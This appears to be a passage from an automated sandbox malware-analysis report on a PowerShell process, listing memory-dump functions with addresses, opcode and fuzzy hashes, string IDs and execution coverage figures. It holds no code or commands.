                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 07B0F8E0 Relevance: .2, Instructions: 236COMMON
                                                                                              Download Yara Rule
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000001.00000002.2402085514.0000000007B00000.00000040.00000800.00020000.00000000.sdmp, Offset: 07B00000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_1_2_7b00000_powershell.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 6cfb783d596f655f367936e7ad4c6f645bf660fbf80fb83bd5eb7b75ea65c5a8
                                                                                              • Instruction ID: 8a624ee0c53648eb1a475a5de77afcde72886966d2f7b6d74b39180d5bbf3ed9
                                                                                              • Opcode Fuzzy Hash: 6cfb783d596f655f367936e7ad4c6f645bf660fbf80fb83bd5eb7b75ea65c5a8
                                                                                              • Instruction Fuzzy Hash: 2E9151B4B00209DFDB24CF58C555AAABBF2EF89314F1584A9E805AB395CB32DC45CF91
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 07B019B9 Relevance: .2, Instructions: 213COMMON
                                                                                              Download Yara Rule
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000001.00000002.2402085514.0000000007B00000.00000040.00000800.00020000.00000000.sdmp, Offset: 07B00000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_1_2_7b00000_powershell.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 6a160a6f2c0536cb9fc918890ab1ec66d71bae41de615e4b0c409d6ca1bdc859
                                                                                              • Instruction ID: 99c60612ab9257d0b5c54bc260c2c90b13b0b2c19eb618246af059d0ce2c2098
                                                                                              • Opcode Fuzzy Hash: 6a160a6f2c0536cb9fc918890ab1ec66d71bae41de615e4b0c409d6ca1bdc859
                                                                                              • Instruction Fuzzy Hash: 0081BFB070424C9FD718CB98C951EADBFB2EF85304F1580A9E9059F796CA72EC46CB91
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 07B058AB Relevance: .2, Instructions: 211COMMON
                                                                                              Download Yara Rule
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000001.00000002.2402085514.0000000007B00000.00000040.00000800.00020000.00000000.sdmp, Offset: 07B00000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_1_2_7b00000_powershell.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 5de250699691567e19f26117688730c7bf0e1800156dd4024eccb717bec2b0bd
                                                                                              • Instruction ID: b10de70b15a3f2ff249b00852fa8a0fed06d11be530e656574bd0b61408a842e
                                                                                              • Opcode Fuzzy Hash: 5de250699691567e19f26117688730c7bf0e1800156dd4024eccb717bec2b0bd
                                                                                              • Instruction Fuzzy Hash: 77816DB1A00205DFEB24CF58C485E99BBB2EF89314F148499E9056BB91C772ED94CFE1
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 07B079F5 Relevance: .1, Instructions: 140COMMON
                                                                                              Download Yara Rule
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000001.00000002.2402085514.0000000007B00000.00000040.00000800.00020000.00000000.sdmp, Offset: 07B00000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_1_2_7b00000_powershell.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: ebf3f301e9b6c9a68caefe9f7660ff84720e1f1ca53eef0e00debf061b94b883
                                                                                              • Instruction ID: eddbe64a88744c1da54c24cf992f9633fe245c90410401330805dfc005b276f7
                                                                                              • Opcode Fuzzy Hash: ebf3f301e9b6c9a68caefe9f7660ff84720e1f1ca53eef0e00debf061b94b883
                                                                                              • Instruction Fuzzy Hash: A141ACF17401148BEF2196789810A9EFF92DFE1314B1088EED5019F392DD22E91AC7E2
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 07B054CD Relevance: .1, Instructions: 106COMMON
                                                                                              Download Yara Rule
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000001.00000002.2402085514.0000000007B00000.00000040.00000800.00020000.00000000.sdmp, Offset: 07B00000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_1_2_7b00000_powershell.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: df581f484365e380392ff5b3160c520ef0e17da19c82e10d63181202039fdace
                                                                                              • Instruction ID: ccdc2f80590acc17da85db5a84438c4ceb54f98b9488ff469640fddf94e20aed
                                                                                              • Opcode Fuzzy Hash: df581f484365e380392ff5b3160c520ef0e17da19c82e10d63181202039fdace
                                                                                              • Instruction Fuzzy Hash: 18315BF67002018BEB3446389820B7EBF97DFD1211B1484AAD502CBBD1DE36D8668BE1
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 07B04620 Relevance: .1, Instructions: 102COMMON
                                                                                              Download Yara Rule
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000001.00000002.2402085514.0000000007B00000.00000040.00000800.00020000.00000000.sdmp, Offset: 07B00000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_1_2_7b00000_powershell.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 85730dc2167d395308da7c1bd55ef052ab4a103fb4536c75064246087b2d64c2
                                                                                              • Instruction ID: c04821814dd182efce6053938bdf84ea075ece955963ad7d44c1321c85f151e2
                                                                                              • Opcode Fuzzy Hash: 85730dc2167d395308da7c1bd55ef052ab4a103fb4536c75064246087b2d64c2
                                                                                              • Instruction Fuzzy Hash: B631D370B40118AFE704A764C955FAE7AA3EFD5304F148858EA01AF7A1CF76DC498BD1
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 07B013E8 Relevance: .1, Instructions: 94COMMON
                                                                                              Download Yara Rule
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000001.00000002.2402085514.0000000007B00000.00000040.00000800.00020000.00000000.sdmp, Offset: 07B00000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_1_2_7b00000_powershell.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: b2bbc93f28de2c6783ab5f11eb122444fc415bf25e6ef07c8b0e3a7ba8acc119
                                                                                              • Instruction ID: 30a425049319b8767947f8c9eaec8b3781504a5e47ff59429e0fa447bc7591a4
                                                                                              • Opcode Fuzzy Hash: b2bbc93f28de2c6783ab5f11eb122444fc415bf25e6ef07c8b0e3a7ba8acc119
                                                                                              • Instruction Fuzzy Hash: F2212CF170031E67EB28596E880073FBADA9FC4711F148869E509CF3E5ED75D4858BA1
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 04F47ACB Relevance: .1, Instructions: 81COMMON
                                                                                              Download Yara Rule
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000001.00000002.2394379402.0000000004F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 04F40000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_1_2_4f40000_powershell.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 8c0a949b1f880e96fba11164ab4add206dde109b3b7ba9c8a1f95bf7b74fc374
                                                                                              • Instruction ID: 16105f119cfcf1fdee2521c02f8da0a859dc27018b84c96255d0843a06a4da69
                                                                                              • Opcode Fuzzy Hash: 8c0a949b1f880e96fba11164ab4add206dde109b3b7ba9c8a1f95bf7b74fc374
                                                                                              • Instruction Fuzzy Hash: DD313C70A00209CFDB18EF69C8947ADBBF2FF88344F148469D805AB7A4DB75A985CB50
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 07B013CC Relevance: .1, Instructions: 77COMMON
                                                                                              Download Yara Rule
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000001.00000002.2402085514.0000000007B00000.00000040.00000800.00020000.00000000.sdmp, Offset: 07B00000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_1_2_7b00000_powershell.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: a2f2208b16a7dfd6200fb5ce6e7ca2d6f5a56e30529eb96a06b825f444f18fbf
                                                                                              • Instruction ID: ea5f1061311f3a93dfd595b69d06f8a8083deaeec154189f90c2e4978e77dde2
                                                                                              • Opcode Fuzzy Hash: a2f2208b16a7dfd6200fb5ce6e7ca2d6f5a56e30529eb96a06b825f444f18fbf
                                                                                              • Instruction Fuzzy Hash: 60216BF170434E6BEB280A7E880077E7FE69F91700F1884AAE548DF3E5D574E4858BA0
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 04F4780A Relevance: .1, Instructions: 63COMMON
                                                                                              Download Yara Rule
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000001.00000002.2394379402.0000000004F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 04F40000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_1_2_4f40000_powershell.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 883ab4348d5798dd5c7f2a8a09a44ec390c33d4fef62a014a471a2d2444f464c
                                                                                              • Instruction ID: 525c6e2889e428885febc021a5656fda1c27526b169f0a42ce3ab9c80622c843
                                                                                              • Opcode Fuzzy Hash: 883ab4348d5798dd5c7f2a8a09a44ec390c33d4fef62a014a471a2d2444f464c
                                                                                              • Instruction Fuzzy Hash: D8219035A402059FDB14EB68D4547EDBFF2EB88310F050029E406A77A0DF756D81CBA0
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 07B011D8 Relevance: .1, Instructions: 52COMMON
                                                                                              Download Yara Rule
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000001.00000002.2402085514.0000000007B00000.00000040.00000800.00020000.00000000.sdmp, Offset: 07B00000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_1_2_7b00000_powershell.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 3ec89527bb83c605b6242de7f4687db1bb0ef0deaf9bfa7cd07be1d2b97a5d71
                                                                                              • Instruction ID: 2c73de61afc3c93766e9cab43980710d7dc46e7380959a1abedcc6a7f64db93f
                                                                                              • Opcode Fuzzy Hash: 3ec89527bb83c605b6242de7f4687db1bb0ef0deaf9bfa7cd07be1d2b97a5d71
                                                                                              • Instruction Fuzzy Hash: 430124B630021E9BEB2859AEE40056FBB99DBC6322F14C47ED449CB290C632C84583A0
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 04AED01D Relevance: .0, Instructions: 45COMMON
                                                                                              Download Yara Rule
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000001.00000002.2394051856.0000000004AED000.00000040.00000800.00020000.00000000.sdmp, Offset: 04AED000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_1_2_4aed000_powershell.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 5aefa70a73144016226057f172713a5e7b047699a466982cf4950c2abd447a70
                                                                                              • Instruction ID: 4461e1a68bf65351a29f71b5f2146c08b4158480a6ec0839bfb2922290efc48e
                                                                                              • Opcode Fuzzy Hash: 5aefa70a73144016226057f172713a5e7b047699a466982cf4950c2abd447a70
                                                                                              • Instruction Fuzzy Hash: 3E01F7311083019AF7105F26D984777BFA8DF45364F1CC529EC6A0A646D279A841C6B1
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 04AED01C Relevance: .0, Instructions: 36COMMON
                                                                                              Download Yara Rule
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000001.00000002.2394051856.0000000004AED000.00000040.00000800.00020000.00000000.sdmp, Offset: 04AED000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_1_2_4aed000_powershell.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 6eea2c55bb13c5d761c8fc888776ea00199c7c9c2d9b986ab64bb1b8bfb98b71
                                                                                              • Instruction ID: bd633d64bf4301b975bdf27c4cf22fac81cfb37c5d6841a106116c4e8d4a43a6
                                                                                              • Opcode Fuzzy Hash: 6eea2c55bb13c5d761c8fc888776ea00199c7c9c2d9b986ab64bb1b8bfb98b71
                                                                                              • Instruction Fuzzy Hash: 54F0C271004340AEE7108F16D984B62FFA8EB45334F18C55AED581E686C279A845CAB1
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 07B00B68 Relevance: .0, Instructions: 30COMMON
                                                                                              Download Yara Rule
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000001.00000002.2402085514.0000000007B00000.00000040.00000800.00020000.00000000.sdmp, Offset: 07B00000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_1_2_7b00000_powershell.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 429431ce3eaa4c60a25faf8631e656dc8f52589be904fd5f0bae63fa03fbaef6
                                                                                              • Instruction ID: 91db46e5f141e91c81abccb0c6e9fdc601482eb27653bccf4fba2963e33f9d30
                                                                                              • Opcode Fuzzy Hash: 429431ce3eaa4c60a25faf8631e656dc8f52589be904fd5f0bae63fa03fbaef6
                                                                                              • Instruction Fuzzy Hash: B0F0ECB53041045FEB149B48D491B3AB753EBC8334714C069E504CF795CE32DC0697D1
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 04F42CB6 Relevance: .0, Instructions: 29COMMON
                                                                                              Download Yara Rule
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000001.00000002.2394379402.0000000004F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 04F40000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_1_2_4f40000_powershell.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 0c8aebc3b65c33205e7bc73e2877c397cd5c21b2b679a69915e5a13fd4fc239e
                                                                                              • Instruction ID: dc3d31f0d26265204b6a21c38e38a336b6a30a9577181939ead75b44f4effa1b
                                                                                              • Opcode Fuzzy Hash: 0c8aebc3b65c33205e7bc73e2877c397cd5c21b2b679a69915e5a13fd4fc239e
                                                                                              • Instruction Fuzzy Hash: 68F0DA35A001099FCB15CF9DD990AEEF7B1FF88324F208159E515A72A1C736AC52CB50
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 07B01D8B Relevance: .0, Instructions: 4COMMON
                                                                                              Download Yara Rule
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000001.00000002.2402085514.0000000007B00000.00000040.00000800.00020000.00000000.sdmp, Offset: 07B00000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_1_2_7b00000_powershell.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 584a3913bed7d41f6751d29dc0af2e109adf5df94d8de11209de24b86f245c04
                                                                                              • Instruction ID: 2108930940694c1c8b8ad4272d9396267f2db374b9021a0985f6588530823504
                                                                                              • Opcode Fuzzy Hash: 584a3913bed7d41f6751d29dc0af2e109adf5df94d8de11209de24b86f245c04
                                                                                              • Instruction Fuzzy Hash: 6BA002742010009BC644DB54C991814F761EFC5219728C4DDA8198B256CF33ED03DA40
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Non-executed Functions

                                                                                              Function 04AEDAAC Relevance: .1, Instructions: 69COMMON
                                                                                              Download Yara Rule
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000001.00000002.2394051856.0000000004AED000.00000040.00000800.00020000.00000000.sdmp, Offset: 04AED000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_1_2_4aed000_powershell.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 3263247e7929e72564245f990ec1d46e44f70ffb718927338fa8cc6db4827a5c
                                                                                              • Instruction ID: 36e575223ae2f8fa294c94ba85b7d4cd036f5879ef60e2db97259f419b0f028f
                                                                                              • Opcode Fuzzy Hash: 3263247e7929e72564245f990ec1d46e44f70ffb718927338fa8cc6db4827a5c
                                                                                              • Instruction Fuzzy Hash: 762136B1604201DFDB04EF19D680B3AFBA9FBE4724F20C67DD9194B241E379E846D662
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 07B0DBFD Relevance: 14.0, Strings: 11, Instructions: 286COMMON
                                                                                              Download Yara Rule
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000001.00000002.2402085514.0000000007B00000.00000040.00000800.00020000.00000000.sdmp, Offset: 07B00000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_1_2_7b00000_powershell.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID: 4'^q$4'^q$tP^q$tP^q$tP^q$tP^q$$^q$(dq$(dq$(dq$(dq
                                                                                              • API String ID: 0-459999756
                                                                                              • Opcode ID: 504d56b3c15ea75e7e8dbc731c45a408aa4a6f57f61c28081918efdf65016d81
                                                                                              • Instruction ID: 40cd059fbc0cb2f2bd87e1e3d490abd6a4c6d4709be4c6d425d957d46c3e75e3
                                                                                              • Opcode Fuzzy Hash: 504d56b3c15ea75e7e8dbc731c45a408aa4a6f57f61c28081918efdf65016d81
                                                                                              • Instruction Fuzzy Hash: 87A1E7B174021A9FEB289F98C544A6ABFA2EB89310F148899E8019F3D5CB71DD45C7E1
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 07B0A261 Relevance: 10.2, Strings: 8, Instructions: 169COMMON
                                                                                              Download Yara Rule
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000001.00000002.2402085514.0000000007B00000.00000040.00000800.00020000.00000000.sdmp, Offset: 07B00000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_1_2_7b00000_powershell.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID: 4'^q$4'^q$tP^q$tP^q$$^q$$^q$$^q$$^q
                                                                                              • API String ID: 0-3865595929
                                                                                              • Opcode ID: 0fd7ec85d4fc5a0cca6df4f95bbd603d5288e0f8f16e4a908d26b448fd167045
                                                                                              • Instruction ID: 1e7e5a34cc414c02f47370dc16b8a83b4278d7e2fd1d2883faac9ef5fa3f9acd
                                                                                              • Opcode Fuzzy Hash: 0fd7ec85d4fc5a0cca6df4f95bbd603d5288e0f8f16e4a908d26b448fd167045
                                                                                              • Instruction Fuzzy Hash: F451F6F1B40306DFEB258B68844466EBFA2EB85710F14C8E9D4559F2D5CB32D845CBD1
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 07B0A650 Relevance: 7.6, Strings: 6, Instructions: 105COMMON
                                                                                              Download Yara Rule
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000001.00000002.2402085514.0000000007B00000.00000040.00000800.00020000.00000000.sdmp, Offset: 07B00000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_1_2_7b00000_powershell.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID: $^q$$^q$$^q$$^q$$^q$$^q
                                                                                              • API String ID: 0-2392861976
                                                                                              • Opcode ID: 9d2eb50e1fea6adf88f8709e8effb90a0f1d6ba33047db8c136575ae57454dda
                                                                                              • Instruction ID: aa94706c58eb02b2c1ead97fdaa8162aea4d0c47895680346824564b2aa6f92e
                                                                                              • Opcode Fuzzy Hash: 9d2eb50e1fea6adf88f8709e8effb90a0f1d6ba33047db8c136575ae57454dda
                                                                                              • Instruction Fuzzy Hash: 2931F2FAB043068FFB2A4A659844166BBB1EB82610B24CCFFC002CF285DE32C4498791
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 07B02540 Relevance: 6.4, Strings: 5, Instructions: 128COMMON
                                                                                              Download Yara Rule
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000001.00000002.2402085514.0000000007B00000.00000040.00000800.00020000.00000000.sdmp, Offset: 07B00000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_1_2_7b00000_powershell.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID: 4'^q$4'^q$$^q$$^q$$^q
                                                                                              • API String ID: 0-3272787073
                                                                                              • Opcode ID: ffdb160b1efba6594d9e1428eb45e9519618c71b5efad4488e1bae764ae3ae68
                                                                                              • Instruction ID: 44f0eeb033092104f6ae86cf316e01b9f7106e0e6d7956120f2cc0cf3e800dc7
                                                                                              • Opcode Fuzzy Hash: ffdb160b1efba6594d9e1428eb45e9519618c71b5efad4488e1bae764ae3ae68
                                                                                              • Instruction Fuzzy Hash: 9341D7F5B00206DFEB294E69856D1EABBA5FB81210F2884EBD815CF2D1DE31C84DC795
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 07B0D6DD Relevance: 6.4, Strings: 5, Instructions: 115COMMON
                                                                                              Download Yara Rule
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000001.00000002.2402085514.0000000007B00000.00000040.00000800.00020000.00000000.sdmp, Offset: 07B00000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_1_2_7b00000_powershell.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID: 4'^q$4'^q$$^q$$^q$$^q
                                                                                              • API String ID: 0-3272787073
                                                                                              • Opcode ID: 4a6e33f0084f33711c7a007cbc21b0e1ff2e4a5951dfe5ec1d3f85619cf927e7
                                                                                              • Instruction ID: 3638ac8e4a4befb4cee1b27c6fddab93adae78b7bbf4761045cbb22c7340d2d1
                                                                                              • Opcode Fuzzy Hash: 4a6e33f0084f33711c7a007cbc21b0e1ff2e4a5951dfe5ec1d3f85619cf927e7
                                                                                              • Instruction Fuzzy Hash: E33137F6B44306CFEB294AE99848676BFE5EFC5110B2448FAC4058A2C5EF35C445C7D1
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 07B0048C Relevance: 6.4, Strings: 5, Instructions: 114COMMON
                                                                                              Download Yara Rule
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000001.00000002.2402085514.0000000007B00000.00000040.00000800.00020000.00000000.sdmp, Offset: 07B00000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_1_2_7b00000_powershell.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID: 4'^q$4'^q$$^q$$^q$$^q
                                                                                              • API String ID: 0-3272787073
                                                                                              • Opcode ID: daf2e2965606c3f6be4cea006b770d18a480c375bf7ffd71fbf8a8f39838645f
                                                                                              • Instruction ID: 790467b2aa466ad4d64d3895bd072bc6ec029df4069c551ebece557302e87ce7
                                                                                              • Opcode Fuzzy Hash: daf2e2965606c3f6be4cea006b770d18a480c375bf7ffd71fbf8a8f39838645f
                                                                                              • Instruction Fuzzy Hash: 903114F570030ADFFB292A2494507BE7FA2EB91261F1044AAD8018F2D5EE35C995C7D2
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 07B0AFF6 Relevance: 5.4, Strings: 4, Instructions: 355COMMON
                                                                                              Download Yara Rule
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000001.00000002.2402085514.0000000007B00000.00000040.00000800.00020000.00000000.sdmp, Offset: 07B00000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_1_2_7b00000_powershell.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID: 4'^q$4'^q$4'^q$4'^q
                                                                                              • API String ID: 0-1420252700
                                                                                              • Opcode ID: a4060df3e6eacb81eae8fdada6f511b52a950a5f3c5c1b5c5d7a8e6edd17d6e6
                                                                                              • Instruction ID: 1bab7c49ace7345e9bd9c765c0f82b0cd758aa23c2e72dd42c8a1a55b16a30a5
                                                                                              • Opcode Fuzzy Hash: a4060df3e6eacb81eae8fdada6f511b52a950a5f3c5c1b5c5d7a8e6edd17d6e6
                                                                                              • Instruction Fuzzy Hash: 58F13BB0A00219DFDB24DB58CD55B9ABBB2BB88304F1084D9D9096F395CB71ED89CF91
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 07B09208 Relevance: 5.1, Strings: 4, Instructions: 94COMMON
                                                                                              Download Yara Rule
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000001.00000002.2402085514.0000000007B00000.00000040.00000800.00020000.00000000.sdmp, Offset: 07B00000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_1_2_7b00000_powershell.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID: $^q$$^q$$^q$$^q
                                                                                              • API String ID: 0-2125118731
                                                                                              • Opcode ID: c99e8001d6ee946a3f7a78054a427f1fbe503695a2708436fc5dbf023c5cff4f
                                                                                              • Instruction ID: 351954f4ed9517085336e04a247b4cdac1c2c24815c64b0aa1e6eecba11f863f
                                                                                              • Opcode Fuzzy Hash: c99e8001d6ee946a3f7a78054a427f1fbe503695a2708436fc5dbf023c5cff4f
                                                                                              • Instruction Fuzzy Hash: 142166F130430A9BFB34557A9840B67BFDA9BC5B10F25886AE50ACB3C6DD75E844C3A1
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 07B00321 Relevance: 5.0, Strings: 4, Instructions: 38COMMON
                                                                                              Download Yara Rule
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000001.00000002.2402085514.0000000007B00000.00000040.00000800.00020000.00000000.sdmp, Offset: 07B00000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_1_2_7b00000_powershell.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID: 4'^q$4'^q$$^q$$^q
                                                                                              • API String ID: 0-2049395529
                                                                                              • Opcode ID: 8e2bbe65676d30407b793def9445a215d5c2e708990d2f0401b040653815a53d
                                                                                              • Instruction ID: bb3929ac0cbe8db57de3047f487a2b075568bd4b4e1910d111c51d9735be58c7
                                                                                              • Opcode Fuzzy Hash: 8e2bbe65676d30407b793def9445a215d5c2e708990d2f0401b040653815a53d
                                                                                              • Instruction Fuzzy Hash: 86F059B1B4520F8BE73D651C251076A8AF7EFC4E1072485AEC8019F3C9CE21CC4A43D6
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Execution Graph

                                                                                              Execution Coverage:6.1%
                                                                                              Dynamic/Decrypted Code Coverage:9.2%
                                                                                              Signature Coverage:1.5%
                                                                                              Total number of Nodes:2000
                                                                                              Total number of Limit Nodes:75
